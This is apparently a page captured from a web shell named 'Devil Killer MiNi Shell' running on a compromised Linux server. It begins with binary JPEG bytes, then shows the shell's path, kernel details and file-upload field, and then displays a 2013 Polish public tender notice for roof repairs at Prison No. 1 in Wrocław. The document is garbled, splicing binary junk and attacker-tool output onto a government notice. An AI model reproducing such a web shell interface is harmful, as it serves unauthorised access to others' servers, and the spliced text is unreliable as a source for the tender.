JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130508/68707-N-2013.html

<p class="kh_header"><b>Wrocław: Remont części dachów w zespole budynków Zakładu Karnego Nr 1 we Wrocławiu - etap III</b><br>
<b>Numer ogłoszenia: 68707 - 2013; data zamieszczenia: 08.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny nr 1 , ul. Kleczkowska 35, 50-211 Wrocław, woj. dolnośląskie, tel. 071 3272600.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont części dachów w zespole budynków Zakładu Karnego Nr 1 we Wrocławiu - etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są roboty budowlane polegające na remoncie części dachów w zespole budynków Zakładu Karnego Nr 1 we Wrocławiu - etap III. 
2.Oznaczenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV): 
a)45111100-9 - roboty rozbiórkowe;
b)45262522-6 - roboty murowe;
c)45324000-4 - tynki cementowo-wapienne;
d)45261214-7 - montaż pokrycia papowego;
e)45261000-4 - montaż obróbek blacharskich, rynien i rur spustowych;
f)45223100-7 - konstrukcje stalowe;
g)45312310-3 - instalacja odgromowa.
3.Dach płaski o konstrukcji drewnianej pokryty papą o powierzchni 696 m2. W skład dachu wchodzą następujące części składowe:
a)dach szpitala o powierzchni 92 m2;
b)dach przybudówki o powierzchni 45 m2;
c)dach łącznika szpitala o powierzchni 332 m2;
d)dach szybu windy o powierzchni 6,5 m2;
e)dach magazynu o powierzchni 164 m2;
f)dach przybudówki o powierzchni 30 m2;
g)zadaszenie wejścia 26,5 m2.

Różnica pomiędzy powierzchnią przedstawioną w projekcie budowlano-wykonawczym (696 m2), a powierzchnią przedstawioną w przedmiarze robót (693,60 m2) wynika z odjęcia powierzchni kominów, podstaw wentylatorów i wywietrzaków (2,4 m2).               
4.Zakres prac przewidzianych do realizacji.
a)wykonanie robót budowlanych:
- demontaż istniejącego pokrycia dachowego papowego;
- demontaż istniejących obróbek blacharskich i opierzeń, rynien i rur spustowych, itp.;
- demontaż świetlików;
- przemurowanie kominów;
- wykonanie tynków;
- wykonanie murów ogniowych;
- wykonanie nowego pokrycia papowego;
- wykonanie obróbek blacharskich, opierzeń, rynien i rur spustowych;
- wykonanie i montaż świetlików dachowych;
b) wykonanie robót elektrycznych:
- demontaż istniejącej i wykonanie nowej instalacji odgromowej.
Szczegółowy zakres prac przewidzianych do realizacji określa dokumentacja projektowa.
5.Zamówienie obejmuje swoim zakresem roboty budowlane i elektryczne. Kompletna dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót oraz przedmiar robót stanowią załączniki do niniejszej specyfikacji - wykaz w załączniku nr 7.
6.Prace będą realizowane na podstawie nw. dokumentacji projektowej:
a)projekt budowlano-wykonawczy sporządzony przez Architekta Pana Michała Wyczałkowskiego Pracownia Projektowo-Wykonawcza, ul. Braniewska 8, 54-109 Wrocław;
b)specyfikacja techniczna wykonania i odbioru robót budowlanych dotycząca remontu części dachów w zespole budynków Zakładu Karnego Nr 1 we Wrocławiu - etap III;
c)przedmiar robót dotyczący remontu części dachów w zespole budynków Zakładu Karnego Nr 1 we Wrocławiu - etap III.
7.Roboty należy wykonać zgodnie z dokumentacją projektową, wyszczególnioną w pkt. 5, przepisami prawa budowlanego, polskimi normami oraz sztuką budowlaną.
8.Roboty należy wykonać zgodnie z dokumentacją projektową i specyfikacją techniczną wykonania i odbioru robót, przepisami prawa budowlanego, polskimi normami, sztuką budowlaną oraz wytycznymi zamawiającego przedstawionymi w niniejszej specyfikacji. 
9.Materiały użyte do realizacji przedmiotu zamówienia muszą być dopuszczone do obrotu i powszechnego lub jednostkowego stosowania w budownictwie, o właściwościach użytkowych zapewniających prawidłowe funkcjonowanie obiektu remontowanego w ramach niniejszego zamówienia - zgodnie z art. 10 Ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jednolity: Dz.U.z 2010 Nr 243, poz. 1623 z późniejszymi zmianami) i przepisami wykonawczymi do wymienionej ustawy.
10.Jeżeli w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót projektant określił parametry materiałów lub urządzeń przez podanie ich nazw lub producentów, w ofercie należy przyjąć wskazane materiały i urządzenia lub równoważne o parametrach nie niższych niż parametry materiałów i urządzeń wskazanych w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót.
11.Wykonawca jest zobowiązany uzyskać zgodę Zamawiającego na zastosowanie materiałów i urządzeń innych niż podane w dokumentacji projektowej, przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót. W takim przypadku należy skierować do Zamawiającego pytanie, czy na etapie realizacji zamówienia można zastosować zaproponowany przez wykonawcę materiał lub urządzenie. Pytanie należy sformułować w sposób szczegółowy. Należy wskazać materiał lub urządzenie, z którego wykonawca chce zrezygnować z podaniem jego ilości oraz podać nazwę, ilość i charakterystykę techniczną materiału lub urządzenia, które wykonawca zamierza zastosować zamiennie. Jeżeli wykonawca bez zgody Zamawiającego przyjmie w ofercie inne materiały lub urządzenia niż materiały i urządzenia wskazane w dokumentacji projektowej, w przedmiarze robót oraz w specyfikacji technicznej wykonania i odbioru robót i Zamawiający stwierdzi, że nie są one równoważne, to w takim przypadku uznaje się, że treść oferty nie odpowiada treści specyfikacji istotnych warunków zamówienia.
12.Pod pojęciem zamówienia należy rozumieć wszystkie prace niezbędne do wykonania w pełnym zakresie, dotyczące remontu części dachów w zespole budynków Zakładu Karnego Nr 1 we Wrocławiu - etap III.
13.Pokrycie dachu należy wykonać papą. Wyrób musi spełniać normy PN-B-12020:1997 oraz PN-EN-1304:2002.
14.Zamawiający umożliwi wizję lokalną obiektu, będącego przedmiotem zamówienia. W tym celu należy poinformować Zamawiającego o zamiarze przeprowadzenia wizji, a Zamawiający wyznaczy termin jej przeprowadzenia. 
15.Dodatkowe wymagania Zamawiającego związane z realizacją zamówienia - klauzula społeczna. Na podstawie art. 29 ust.4 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2010 Nr 113, poz. 759 z późn. zm.) Wykonawca przy realizacji zamówienia musi zatrudnić co najmniej jedną z niżej wymienionych osób:
a) niepełnosprawną - co oznacza osobę spełniającą przesłanki statusu niepełnoprawności określone ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (tekst jednolity: Dz. U. z 2011 r. Nr 127, poz. 721, z późn. zm.). Zamawiający wymaga przedłożenia przez Wykonawcę orzeczenia o niepełnosprawności wydanego przez zespół do spraw orzekania o niepełnosprawności, lub orzeczenia o całkowitej lub częściowej niezdolności do pracy przez wystawionego przez lekarza orzecznika Zakładu Ubezpieczeń Społecznych, 
b) bezrobotną - co oznacza osobę spełniającą przesłanki art. 2 ust. 1 pkt 2 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415, z późn. zm.). Zamawiający wymaga przedłożenia przez Wykonawcę zaświadczenia potwierdzającego fakt zarejestrowania, przed podjęciem pracy u Wykonawcy przy realizacji zamówienia, w/w osoby we właściwym powiatowym urzędzie pracy,
c)młodocianą w celu przygotowania zawodowego - co oznacza zgodnie z działem IX Kodeksu pracy - pracownika, który ukończył 16 lat, a nie przekroczył 18 lat i nie posiada kwalifikacji zawodowych. Zgodnie z Rozporządzeniem Rady Ministrów z dnia 28 maja 1996 r. w sprawie przygotowania zawodowego młodocianych i ich wynagradzania (Dz. U. z 1996 r. Nr 60, poz. 278) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 5 grudnia 2002 r. w sprawie przypadków, w których wyjątkowo jest dopuszczalne zatrudnianie młodocianych, którzy nie ukończyli gimnazjum, osób niemających 16 lat, które ukończyły gimnazjum, oraz osób niemających 16 lat, które nie ukończyły gimnazjum (Dz. U. z 2002 r. Nr 214, poz. 1808). Zamawiający wymaga przedłożenia przez Wykonawcę umowy o pracę w celu przygotowania zawodowego, 
d)inną niż określone w lit. a, b lub c, o których mowa w przepisach o zatrudnieniu socjalnym - co oznacza osobę nie będącą bezrobotną lub niepełnosprawną, która została wymieniona w art. 1 ust. 2 ustawy z dnia 13 czerwca 2003 r. o zatrudnieniu socjalnym (Dz. U. z 2011 r. Nr 43 poz. 225). Do osób tych zalicza się:
- bezdomnego realizującego indywidualny program wychodzenia z bezdomności, w rozumieniu    przepisów o pomocy społecznej;                                                                                     
- uzależnionego od alkoholu, po zakończeniu programu psychoterapii w zakładzie lecznictwa odwykowego;                            
- uzależnionego od narkotyków lub innych środków odurzających, po zakończeniu programu terapeutycznego w zakładzie opieki zdrowotnej;
- osobę chorą psychicznie, w rozumieniu przepisów o ochronie zdrowia psychicznego;
- osobę zwolnioną z zakładu karnego, mającą trudności w integracji ze środowiskiem, w rozumieniu przepisów o pomocy społecznej,
- uchodźcę realizującego indywidualny program integracji, w rozumieniu przepisów o pomocy społecznej,
w tym przypadku Zamawiający wymaga przedłożenia zaświadczenia wystawionego przez właściwy ośrodek pomocy społecznej lub instytucję opieki zdrowotnej potwierdzający sytuację danej osoby.
Każda z osób wymienionych powyżej winna być zatrudniona w pełnym wymiarze czasu pracy przy wykonaniu zamówienia na podstawie umowy o pracę lub spółdzielczej umowy o pracę. Zamawiający uprawniony jest do kontroli spełnienia przez Wykonawcę, wymagań dotyczących zatrudnienia w/w osoby. Na żądanie Zamawiającego Wykonawca przedłoży umowę o pracę, spółdzielczą umowę o pracę wraz z dokumentacją zatrudnienia w okresie realizacji zamówienia oraz dokumentami wykazującymi, iż zatrudniona osoba jest osobą, o której mową w lit. a-d. W sytuacji, gdy w/w osoba w okresie wykonywania robót rozwiąże stosunek pracy lub gdy uczyni to pracodawca przed zakończeniem tego okresu, zobowiązany jest on zatrudnić na miejsce tej osoby, inną osobą wymienioną w lit. a-d. W przypadku niezatrudnienia przy realizacji zamówienia osoby, o której mowa powyżej, Wykonawca zapłaci Zamawiającemu kary umowne określone we wzorze umowy - załącznik nr 1 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych zamówień uzupełniających w trybie art. 67 ust. 1 pkt 6 ustawy, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.26.25.22-6, 45.32.40.00-4, 45.26.12.14-7, 45.26.10.00-4, 45.22.31.00-7, 45.31.23.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> a)Zamawiający żąda wniesienia wadium w wysokości 3 500  zł (słownie: trzy tysiące pięćset złotych);                                                                             
b)wadium wnosi się przed upływem terminu składania ofert;
c)wadium może być wnoszone w jednej lub kilku następujących formach:
-  pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz.U. z 2007 r. Nr 42, poz. 275).
d) wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego nr 09 1010 1674 0046 4613 9120 0000;
e) wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym;
f) Zamawiający posiada nieoprocentowany rachunek bankowy;
g) za termin wniesienia wadium w pieniądzu uznaje się termin wpływu kwoty wadium na rachunek bankowy Zamawiającego;
h) wadium wnoszone w innej formie niż pieniężna należy złożyć w siedzibie Zamawiającego, w kasie Zakładu Karnego Nr 1 we Wrocławiu przy ul. Kleczkowskiej 35, w dniach od poniedziałku do piątku w godzinach od 08:00 do 14:00;
i) za termin wniesienia wadium w innej formie niż pieniężna uważa się termin jego złożenia w kasie Zakładu Karnego Nr 1 we Wrocławiu, ul. Kleczkowska 35;
j) nie wniesienie wadium w terminie lub w sposób określony w specyfikacji istotnych warunków zamówienia spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy;
k) Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 16 lit. o;
l) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy;
m) Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert;
n) Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 16 lit. l, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza;
o) Zamawiający zatrzymuje wadium, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
p) Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z załącznikiem nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek Zamawiający uzna Wykonawców, którzy wykonali co najmniej dwie roboty budowlane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, czyli przed dniem 23.05.2013 r., a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegające na remoncie lub wykonaniu dachów krytych papą. Wartość każdej z robót nie może być mniejsza niż 100 000,00 zł brutto. Powierzchnia wyremontowanych lub wykonanych dachów (dotycząca jednej roboty budowlanej) nie może być mniejsza niż 690 m2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z załącznikiem nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek Zamawiający uzna Wykonawców, którzy dysponują  co najmniej jedną osobą zdolną do wykonania zamówienia, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej. Zamawiający wymaga od osób uczestniczących w wykonywaniu zamówienia wszystkich niezbędnych uprawnień w zakresie prawidłowej realizacji przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z załącznikiem nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie  od charakteru prawnego łączących go z nimi stosunków, Wykonawca musi udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania        mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia
2) Kosztorys ofertowy sporządzony metodą uproszczoną, w oparciu o załączone 
przedmiary, wraz ze szczegółową kalkulacją cen jednostkowych netto użytych materiałów i sprzętu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Kwatermistrzowski
Zakładu Karnego Nr 1 we Wrocławiu (pokój nr 420)
ul. Kleczkowska 35
50-211 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2013 godzina 11:45, miejsce: Sekretariat 
Zakładu Karnego Nr 1 we Wrocławiu (pokój nr 308)
ul. Kleczkowska 35
50-211 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





